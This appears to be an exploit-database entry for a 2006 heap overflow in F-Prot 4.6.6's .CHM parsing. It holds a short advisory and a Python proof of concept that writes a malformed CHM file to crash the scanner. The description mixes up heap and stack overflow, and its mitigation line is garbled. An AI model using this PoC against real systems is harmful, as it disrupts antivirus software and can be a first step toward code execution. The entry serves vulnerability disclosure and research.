F-Prot 4.6.6 .CHM Heap Overflow

vendor:

F-Prot 4.6.6

by:

Evgeny Legerov

9,3

CVSS

HIGH

Heap Overflow

119

CWE

Product Name: F-Prot 4.6.6

Affected Version From: 4.6.6

Affected Version To: 4.6.6

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

F-Prot 4.6.6 .CHM Heap Overflow

F-Prot 4.6.6 is vulnerable to a heap overflow vulnerability when processing .CHM files. This vulnerability can be exploited by an attacker to execute arbitrary code on the vulnerable system. The vulnerability is caused due to a boundary error within the processing of the .CHM files. This can be exploited to cause a stack-based buffer overflow by tricking a user into opening a specially crafted .CHM file.

Mitigation:

Upgrade to the latest version of F-Prot 4.6.6

Source

Exploit-DB raw data:

# fprot2.py - trivial proof of concept code for F-Prot 4.6.6 .CHM heap
# overflow
#
# Copyright (c) 2006 Evgeny Legerov
#
# Permission to use, copy, modify, and distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
#
# $ ./fprot2.py > 1.chm
# $ f-prot 1.chm

import sys
import struct

s=""
s+="ITSF"        # signature
s+=struct.pack("<L",3) # version
s+=struct.pack("<L",96) # header_len
s+=struct.pack("<L",1) # unknown
s+=struct.pack("<L",0x41424344) # last_modified
s+=struct.pack("<L",0x419) # lang_id
s+="A"*16 #dir_clsid
s+="B"*16 #stream_clsid
s+=struct.pack("<L",96) + "\x00" * 4 #sec0_offset
s+=struct.pack("<L",24) + "\x00" * 4 #sec0_len
s+=struct.pack("<L",120) + "\x00" *4 #dir_offset
s+=struct.pack("<L",4180) + "\x00" * 4 #dir_len
s+=struct.pack("<L",4300) + "\x00"*4 #data_offset
s+="A"*24
s+="ITSP"
s+=struct.pack("<L", 1) # version
s+=struct.pack("<L",0x54) # header_len
s+=struct.pack("<L", 0xa) # unknown
s+=struct.pack("<L",1000) # block_len - BUG?
s+=struct.pack("<L",2) # blockidx
s+=struct.pack("<L", 1) # index_depth
s+=struct.pack("<L", -1) # index_root
s+=struct.pack("<L",0) # index_head
s+=struct.pack("<L",0) # index_tail
s+=struct.pack("<L", -1) # unknown2
s+=struct.pack("<L",1) # num_blocks
s+=struct.pack("<L", 1033) # lang_id
s+="A"*32
s+="B"*10000

sys.stdout.write(s)

# milw0rm.com [2006-12-04]